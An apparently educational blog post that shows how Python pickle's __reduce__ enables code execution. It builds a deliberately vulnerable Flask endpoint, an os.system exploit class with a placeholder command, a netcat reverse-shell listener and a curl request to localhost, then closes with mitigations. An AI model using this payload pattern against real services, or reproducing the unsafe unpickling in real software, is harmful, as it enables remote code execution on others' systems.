In a recent challenge I needed to get access to a system by exploiting the way Python deserializes data using the pickle module. In this article I want to give a quick introduction to pickling and unpickling data, highlight the issues that can arise when your program deals with data from untrusted sources, and “dump” my own notes.
For running the example code I’m using Python 3.8.2 on macOS 10.15; the demonstration of the reverse shell is just a connect-back to a loopback address.
TL;DR: Never unpickle data from sources you don’t trust. Otherwise you expose your app to a relatively simple form of remote code execution.
In Python, the pickle module lets you serialize and deserialize data. Essentially, this means that you can convert a Python object into a stream of bytes and then reconstruct it (including the object’s internal structure) later in a different process or environment by loading that stream of bytes.
When consulting the Python docs for pickle one cannot miss the following warning:
Warning: The pickle module is not secure. Only unpickle data you trust.
Let’s find out why that is and how unpickling untrusted data could ruin your day.
How to dump and load?
In Python you can serialize objects by using pickle.dumps. The pickled representation we’re getting back from dumps is a bytes object rather than human-readable text.
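As a minimal sketch of that call (the variable names are my own, and I pin protocol 4 explicitly because it is the default in Python 3.8, which keeps the output reproducible on other versions):

```python
import pickle

# Pin protocol 4 (the default in Python 3.8) so the bytes are reproducible.
data = ['pickle', 'me', 1, 2, 3]
pickled = pickle.dumps(data, protocol=4)

print(type(pickled))  # <class 'bytes'>
print(pickled)
# b'\x80\x04\x95\x19\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x06pickle\x94\x8c\x02me\x94K\x01K\x02K\x03e.'
```

The readable fragments (pickle, me) are the string items of the list; everything around them is opcodes and their arguments.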
Reading the serialized data back in with pickle.loads gives us our list object back:
['pickle', 'me', 1, 2, 3]
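The round trip can be sketched as follows. The names original and restored are just illustrative; the point is that loading produces an equal but newly constructed object.

```python
import pickle

original = ['pickle', 'me', 1, 2, 3]
pickled = pickle.dumps(original)

# loads() processes the byte stream and rebuilds the object from it.
restored = pickle.loads(pickled)

print(restored)              # ['pickle', 'me', 1, 2, 3]
print(restored == original)  # True: same contents
print(restored is original)  # False: a newly constructed list
```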
What is actually happening behind the scenes is that the byte stream created by dumps contains opcodes that are executed one by one as soon as we load the pickle back in. If you are curious what the instructions in this pickle look like, you can use pickletools to create a disassembly:
>>> pickled = pickle.dumps(['pickle', 'me', 1, 2, 3])
>>> import pickletools
>>> pickletools.dis(pickled)
    0: \x80 PROTO      4
    2: \x95 FRAME      25
   11: ]    EMPTY_LIST
   12: \x94 MEMOIZE    (as 0)
   13: (    MARK
   14: \x8c     SHORT_BINUNICODE 'pickle'
   22: \x94     MEMOIZE    (as 1)
   23: \x8c     SHORT_BINUNICODE 'me'
   27: \x94     MEMOIZE    (as 2)
   28: K        BININT1    1
   30: K        BININT1    2
   32: K        BININT1    3
   34: e        APPENDS    (MARK at 13)
   35: .    STOP
highest protocol among opcodes = 4
Controlling the behavior of pickling/unpickling
Not every object can be serialized (e.g. file handles), and pickling and unpickling certain objects (like functions or classes) comes with restrictions. The Python docs give you a good overview of what can and cannot be pickled.
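To illustrate the file handle case, here is a small sketch. Opening os.devnull is just my way of getting a file object that exists on any platform, and the exact error message varies between Python versions.

```python
import os
import pickle

# An open file wraps an OS-level handle that has no meaningful
# byte representation, so pickle refuses to serialize it.
with open(os.devnull) as handle:
    try:
        pickle.dumps(handle)
        outcome = "pickled"
    except TypeError as exc:
        outcome = f"refused: {exc}"

print(outcome)
```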
While in most cases you don’t need to do anything special to make an object “picklable”, pickle still allows you to define a custom behavior for the pickling process for your class instances.
Reading a bit further down in the docs we can see that, from an attacker’s perspective, implementing __reduce__ is exactly what we need to get code execution:
The __reduce__() method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order:
- A callable object that will be called to create the initial version of the object.
- A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. […]
So by implementing __reduce__ in a class whose instances we are going to pickle, we can hand the unpickling process a callable plus some arguments to run. Although this mechanism is intended for reconstructing objects, we can abuse it to get our own reverse shell code executed.
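Before reaching for a shell, the mechanism can be sketched with a harmless callable. The class name Demo and the use of print are my own stand-ins; any importable callable would be invoked the same way.

```python
import contextlib
import io
import pickle

class Demo:
    def __reduce__(self):
        # (callable, args): the unpickler will call print(...) on load.
        return print, ("this ran during unpickling",)

payload = pickle.dumps(Demo())

# Capture stdout to make the side effect of loads() visible.
captured = io.StringIO()
with contextlib.redirect_stdout(captured):
    result = pickle.loads(payload)

print(repr(captured.getvalue()))  # 'this ran during unpickling\n'
print(result)                     # None: print's return value, not a Demo
```

Note that the loading side never needs the Demo class itself: the pickle only references print and its arguments, so the call happens in any process that loads these bytes.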
Creating a vulnerable app
Now that we have a basic idea of how to create dangerous data to unpickle, let’s build a vulnerable app for demonstration purposes.
We’ll use the web framework Flask to create a small web application with one route.
Let’s install Flask in a new virtual environment:
# setup virtualenv
virtualenv venv --python=/your/path/to/python
# activate
source venv/bin/activate
# install Flask
pip install Flask
And now create the application file. At /hackme we implement a POST route that takes a form field named pickled. The data comes encoded in base64 (for transfer), is decoded and then unpickled.
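A minimal sketch of such an app could look like the following. Several details are my assumptions rather than part of the notes above: the file would be saved as app.py (a name flask run discovers by default), the URL-safe base64 variant is used so the value survives form encoding, and the route returns an empty 204 response.

```python
import base64
import pickle

from flask import Flask, request

app = Flask(__name__)

@app.route("/hackme", methods=["POST"])
def hackme():
    # Decode the base64 form field back into raw pickle bytes.
    data = base64.urlsafe_b64decode(request.form["pickled"])
    # DANGEROUS: loads() will call whatever the sender embedded.
    pickle.loads(data)
    return "", 204
```

The single pickle.loads call on request data is the entire vulnerability; nothing else in the app needs to be wrong.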
Let’s run the app with flask run and then prepare our malicious pickled data to send.
Creating the exploit
As described above we want to create a class that implements __reduce__ and then serialize an instance of that class.
We’ll call our class RCE and let its __reduce__ method return a tuple of a callable and a tuple of arguments (as per the docs quoted above).
Our callable will be os.system and the argument a common reverse shell snippet using a named pipe, which will run on our macOS demo machine.
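The shape of such an exploit script can be sketched like this. To keep the sketch harmless I use a placeholder echo command instead of the reverse shell snippet, and the helper name build_payload and the URL-safe base64 encoding are my own choices.

```python
import base64
import os
import pickle

# Harmless placeholder; the real payload would be the reverse shell command.
COMMAND = "echo payload executed"

class RCE:
    def __reduce__(self):
        # On load, the unpickler calls os.system(COMMAND).
        return os.system, (COMMAND,)

def build_payload():
    """Pickle an RCE instance and base64-encode it for transfer."""
    return base64.urlsafe_b64encode(pickle.dumps(RCE()))

if __name__ == "__main__":
    print(build_payload())
```

Creating the payload does not run the command; os.system is only called when some process unpickles the bytes.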
Now let’s run the exploit script to create a base64 encoded pickle byte stream:
$ python exploit.py
b'gASVbgAAAAAAAACMBX...
If you run pickletools.dis again, you will see the system callable plus its arguments and the REDUCE opcode, which applies the callable to those arguments.
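If you prefer to check for those opcodes programmatically, a sketch using pickletools.genops could look like this. The placeholder command and the pinned protocol 4 are my assumptions; genops only parses the byte stream and does not execute it.

```python
import os
import pickle
import pickletools

class RCE:
    def __reduce__(self):
        # Placeholder command standing in for the reverse shell snippet.
        return os.system, ("echo payload executed",)

payload = pickle.dumps(RCE(), protocol=4)

# genops() yields (opcode, argument, position) without executing anything.
opcode_names = [op.name for op, arg, pos in pickletools.genops(payload)]
print(opcode_names)

# STACK_GLOBAL resolves the callable by module and name,
# REDUCE then calls it with the argument tuple.
print("STACK_GLOBAL" in opcode_names, "REDUCE" in opcode_names)
```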
Sending the payload
Finally, we can start a netcat listener and send the payload to our listening Flask application:
# netcat listener for reverse shell in separate window/pane
nc -nvl 1234
# Send request
curl -d "pickled=gASVbgAAAAAAAACMBX..." http://127.0.0.1:5000/hackme
After sending the HTTP request to /hackme, our code will execute and give us a shell back.
Lesson from this demonstration: don’t unpickle untrusted data. It doesn’t matter if you receive this pickled data from anonymous users over the network or if it’s passed to you to restore a session or program state.
If you need to work with untrusted data – depending on your use case – consider signing the data if it could have been modified on the way to you or on disk, or choose a different (safer) serialization method altogether (like JSON), as per the docs. When storing pickles on the filesystem it is also worth checking the file permissions to prevent privilege escalations through modification of those pickles.
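As a rough sketch of the signing idea, the pickle bytes can be prefixed with an HMAC tag that is verified before anything is unpickled. The key, the function names and the tag-then-payload layout are all hypothetical choices of mine for illustration.

```python
import hashlib
import hmac
import pickle

# Hypothetical key for illustration; load a real one from secure storage.
SECRET_KEY = b"replace-with-a-random-secret"
DIGEST_SIZE = hashlib.sha256().digest_size  # 32 bytes

def sign(obj):
    """Pickle obj and prepend an HMAC-SHA256 tag over the pickle bytes."""
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload

def verify_and_load(blob):
    """Unpickle only if the tag matches; raise ValueError otherwise."""
    tag, payload = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch, refusing to unpickle")
    return pickle.loads(payload)
```

This only detects modification of pickles that you created yourself. It does not make it safe to unpickle data authored by someone else, and it is only as good as the secrecy of the key.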
To learn more, I recommend watching the BlackHat 2011 talk “Sour Pickles, A serialised exploitation guide in one part” by Marco Slaviero. He describes in detail the (un)pickling process and the parts of the pickle virtual machine, and shows how to craft more general shellcode using a custom toolset.